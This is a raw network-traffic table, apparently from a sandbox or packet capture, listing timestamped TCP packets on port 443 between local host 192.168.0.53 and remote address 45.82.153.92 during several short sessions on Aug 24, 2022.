Aug 24, 2022 11:19:45.852396011 CEST	49346	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:45.852581024 CEST	443	49346	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:45.852763891 CEST	49346	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:45.852777958 CEST	443	49346	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:45.852910995 CEST	49346	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:45.853909016 CEST	49346	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:45.896770000 CEST	443	49346	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:45.913214922 CEST	49345	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:45.913232088 CEST	443	49345	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:45.968425035 CEST	443	49346	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:45.968525887 CEST	443	49346	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:45.968560934 CEST	49346	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:45.968722105 CEST	49346	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:45.977833986 CEST	49346	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:45.977853060 CEST	443	49346	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:46.019773006 CEST	443	49345	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:46.019910097 CEST	49345	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:46.178217888 CEST	49345	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:46.178229094 CEST	443	49345	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:46.234682083 CEST	49345	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:46.234695911 CEST	443	49345	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:46.237615108 CEST	443	49345	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:46.237946033 CEST	49345	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:46.237952948 CEST	49345	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:46.237957954 CEST	49345	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:46.474765062 CEST	49347	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:46.474816084 CEST	443	49347	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:46.474992990 CEST	49347	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:46.704622030 CEST	49347	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:46.704665899 CEST	443	49347	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:46.813468933 CEST	443	49347	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:46.813765049 CEST	49347	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:46.820308924 CEST	49347	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:46.820338011 CEST	443	49347	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:46.822755098 CEST	49347	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:46.822773933 CEST	443	49347	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:46.825536966 CEST	443	49347	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:46.825877905 CEST	49347	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:46.825891018 CEST	49347	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:46.825896025 CEST	49347	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:46.867098093 CEST	49347	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:46.869822979 CEST	49347	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:46.870081902 CEST	443	49347	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:46.870268106 CEST	49347	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:46.870290041 CEST	443	49347	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:46.870549917 CEST	49347	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:46.872730970 CEST	49347	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:46.912758112 CEST	443	49347	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:46.964298964 CEST	443	49347	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:46.964406967 CEST	443	49347	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:46.964436054 CEST	49347	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:46.964706898 CEST	49347	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:46.982218981 CEST	49347	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:46.982254982 CEST	443	49347	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:47.136311054 CEST	49345	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:47.179215908 CEST	49345	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:47.179466009 CEST	443	49345	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:47.179724932 CEST	49345	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:47.179738045 CEST	443	49345	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:47.179888010 CEST	49345	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:47.221999884 CEST	49345	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:47.230144024 CEST	49348	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:47.230200052 CEST	443	49348	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:47.230348110 CEST	49348	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:47.264759064 CEST	443	49345	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:47.327879906 CEST	443	49345	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:47.327986002 CEST	443	49345	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:47.328113079 CEST	49345	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:47.328207970 CEST	49345	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:47.472320080 CEST	49348	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:47.472357035 CEST	443	49348	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:47.582572937 CEST	443	49348	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:47.582756042 CEST	49348	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:47.589205027 CEST	49348	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:47.589226007 CEST	443	49348	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:47.592221975 CEST	49348	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:47.592233896 CEST	443	49348	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:47.594940901 CEST	443	49348	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:47.595288038 CEST	49348	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:47.595299959 CEST	49348	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:47.595307112 CEST	49348	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:47.641004086 CEST	49348	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:47.643435001 CEST	49348	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:47.643661022 CEST	443	49348	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:47.643872976 CEST	49348	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:47.643893957 CEST	443	49348	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:47.644118071 CEST	49348	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:47.646445990 CEST	49348	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:47.688760996 CEST	443	49348	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:47.731858015 CEST	443	49348	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:47.731951952 CEST	443	49348	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:47.732048988 CEST	49348	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:47.732177973 CEST	49348	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:47.749583006 CEST	49348	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:47.749615908 CEST	443	49348	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:47.836172104 CEST	49345	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:47.836193085 CEST	443	49345	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:50.894536972 CEST	49349	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:50.894573927 CEST	443	49349	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:50.894782066 CEST	49349	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:51.070836067 CEST	49349	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:51.070852995 CEST	443	49349	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:51.178581953 CEST	443	49349	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:51.178759098 CEST	49349	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:51.182600975 CEST	49349	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:51.182627916 CEST	443	49349	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:51.184719086 CEST	49349	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:51.184746981 CEST	443	49349	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:51.187499046 CEST	443	49349	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:51.187863111 CEST	49349	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:51.187877893 CEST	49349	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:51.187884092 CEST	49349	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:51.211766958 CEST	49349	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:51.213301897 CEST	49349	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:51.213534117 CEST	443	49349	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:51.213756084 CEST	49349	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:51.213777065 CEST	443	49349	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:51.214004040 CEST	49349	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:51.214893103 CEST	49349	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:51.256762981 CEST	443	49349	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:51.326416016 CEST	443	49349	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:51.326459885 CEST	443	49349	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:51.326555967 CEST	49349	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:51.326574087 CEST	443	49349	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:51.326788902 CEST	49349	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:51.326796055 CEST	49349	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:51.326800108 CEST	49349	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:51.326805115 CEST	49349	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:51.327029943 CEST	443	49349	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:51.327105999 CEST	443	49349	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:51.327320099 CEST	49349	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:51.327333927 CEST	49349	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:51.334928036 CEST	49349	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:51.336379051 CEST	49349	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:51.336411953 CEST	443	49349	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:52.674511909 CEST	49350	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:52.674573898 CEST	443	49350	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:52.674750090 CEST	49350	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:52.917627096 CEST	49350	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:52.917664051 CEST	443	49350	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:53.023417950 CEST	443	49350	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:53.023554087 CEST	49350	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:53.027174950 CEST	49350	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:53.027201891 CEST	443	49350	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:53.029165983 CEST	49350	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:53.029194117 CEST	443	49350	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:53.031943083 CEST	443	49350	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:53.032224894 CEST	49350	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:53.032238960 CEST	49350	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:53.032246113 CEST	49350	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:53.058173895 CEST	49350	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:53.059640884 CEST	49350	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:53.059866905 CEST	443	49350	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:53.060095072 CEST	49350	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:53.060116053 CEST	443	49350	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:53.060333967 CEST	49350	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:53.061095953 CEST	49350	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:53.104758024 CEST	443	49350	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:53.220988035 CEST	443	49350	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:53.221031904 CEST	443	49350	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:53.221096039 CEST	443	49350	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:53.221185923 CEST	49350	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:53.221327066 CEST	49350	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:53.221349001 CEST	443	49350	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:53.221357107 CEST	49350	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:53.221364975 CEST	49350	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:53.221370935 CEST	49350	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:53.221380949 CEST	443	49350	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:53.221385956 CEST	49350	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:53.221390963 CEST	49350	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:53.221395016 CEST	49350	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:53.221400976 CEST	443	49350	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:53.221404076 CEST	49350	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:53.221407890 CEST	49350	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:53.221472979 CEST	443	49350	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:53.221661091 CEST	49350	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:53.221673012 CEST	49350	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:53.221735954 CEST	49350	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:53.221740961 CEST	49350	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:53.221744061 CEST	49350	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:53.221748114 CEST	49350	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:53.221750975 CEST	49350	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:53.372504950 CEST	49350	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:53.374062061 CEST	49350	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:53.374100924 CEST	443	49350	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:55.648854971 CEST	49351	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:55.648919106 CEST	443	49351	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:55.649215937 CEST	49351	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:56.568969965 CEST	49352	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:56.569021940 CEST	443	49352	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:56.569173098 CEST	49352	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:56.693938971 CEST	49352	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:56.693975925 CEST	443	49352	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:56.802136898 CEST	443	49352	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:56.802297115 CEST	49352	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:56.808063984 CEST	49352	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:56.808090925 CEST	443	49352	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:56.810870886 CEST	49352	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:56.810897112 CEST	443	49352	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:56.813659906 CEST	443	49352	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:56.814003944 CEST	49352	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:56.814018011 CEST	49352	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:56.814024925 CEST	49352	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:56.857748032 CEST	49352	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:56.861423969 CEST	49352	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:56.861664057 CEST	443	49352	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:56.861880064 CEST	49352	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:56.861901999 CEST	443	49352	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:56.862124920 CEST	49352	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:56.864444017 CEST	49352	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:56.904761076 CEST	443	49352	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:56.951003075 CEST	443	49352	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:56.951102018 CEST	443	49352	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:56.951262951 CEST	49352	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:56.951281071 CEST	49352	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:56.969609976 CEST	49352	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:56.969645023 CEST	443	49352	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:57.271604061 CEST	49351	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:57.271650076 CEST	443	49351	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:57.343599081 CEST	49353	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:57.343636036 CEST	443	49353	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:57.343842030 CEST	49353	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:57.376221895 CEST	443	49351	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:57.376359940 CEST	49351	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:57.585294962 CEST	49353	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:57.585311890 CEST	443	49353	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:57.614178896 CEST	49351	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:57.614214897 CEST	443	49351	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:57.657444000 CEST	49351	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:57.657471895 CEST	443	49351	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:57.660244942 CEST	443	49351	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:57.660518885 CEST	49351	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:57.660532951 CEST	49351	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:57.660538912 CEST	49351	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:57.689719915 CEST	443	49353	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:57.689968109 CEST	49353	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:57.697266102 CEST	49353	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:57.697277069 CEST	443	49353	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:57.702769995 CEST	49353	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:57.702779055 CEST	443	49353	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:57.705631018 CEST	443	49353	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:57.705965996 CEST	49353	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:57.705976009 CEST	49353	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:57.705982924 CEST	49353	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:57.751152039 CEST	49353	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:57.754213095 CEST	49353	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:57.754398108 CEST	443	49353	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:57.754544973 CEST	49353	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:57.754560947 CEST	443	49353	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:57.754751921 CEST	49353	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:57.757780075 CEST	49353	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:57.800759077 CEST	443	49353	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:57.835326910 CEST	443	49353	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:57.835417986 CEST	443	49353	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:57.835505009 CEST	49353	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:57.835608959 CEST	49353	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:57.853385925 CEST	49353	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:57.853404999 CEST	443	49353	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:58.170231104 CEST	49354	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:58.170279980 CEST	443	49354	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:58.170470953 CEST	49354	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:58.413130045 CEST	49354	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:58.413150072 CEST	443	49354	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:58.568773031 CEST	443	49354	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:58.568922997 CEST	49354	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:58.575944901 CEST	49354	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:58.575954914 CEST	443	49354	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:58.578816891 CEST	49354	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:58.578825951 CEST	443	49354	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:58.581732035 CEST	443	49354	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:58.582092047 CEST	49354	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:58.582099915 CEST	49354	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:58.582106113 CEST	49354	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:58.625619888 CEST	49351	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:58.632591963 CEST	49354	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:58.635691881 CEST	49354	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:58.635869026 CEST	443	49354	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:58.636163950 CEST	49354	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:58.636176109 CEST	443	49354	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:58.636343956 CEST	49354	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:58.638278961 CEST	49354	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:58.668318033 CEST	49351	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:58.668549061 CEST	443	49351	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:58.668768883 CEST	49351	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:58.668791056 CEST	443	49351	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:58.669040918 CEST	49351	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:58.680759907 CEST	443	49354	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:58.711393118 CEST	49351	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:58.716185093 CEST	443	49354	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:58.716279030 CEST	443	49354	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:58.716339111 CEST	49354	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:58.716525078 CEST	49354	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:58.733973980 CEST	49354	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:58.733994007 CEST	443	49354	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:58.752759933 CEST	443	49351	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:58.814258099 CEST	443	49351	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:58.814352989 CEST	443	49351	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:58.814470053 CEST	49351	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:58.814584017 CEST	49351	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:58.991036892 CEST	49355	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:58.991086960 CEST	443	49355	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:58.991240025 CEST	49355	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:59.233500004 CEST	49355	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:59.233536959 CEST	443	49355	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:59.340147018 CEST	443	49355	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:59.340307951 CEST	49355	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:59.347309113 CEST	49355	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:59.347336054 CEST	443	49355	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:59.349675894 CEST	49355	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:59.349703074 CEST	443	49355	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:59.352446079 CEST	443	49355	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:59.352730036 CEST	49355	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:59.352744102 CEST	49355	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:59.352756977 CEST	49355	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:59.397974968 CEST	49355	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:59.400983095 CEST	49355	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:59.401204109 CEST	443	49355	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:59.401408911 CEST	49355	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:59.401431084 CEST	443	49355	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:59.401669979 CEST	49355	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:59.403839111 CEST	49355	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:59.417853117 CEST	49351	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:59.417886972 CEST	443	49351	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:59.444761992 CEST	443	49355	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:59.485918999 CEST	443	49355	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:59.486010075 CEST	443	49355	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:59.486167908 CEST	49355	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:59.486263990 CEST	49355	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:59.504190922 CEST	49355	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:59.504226923 CEST	443	49355	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:59.826649904 CEST	49356	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:59.826697111 CEST	443	49356	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:59.826848984 CEST	49356	443	192.168.0.53	45.82.153.92
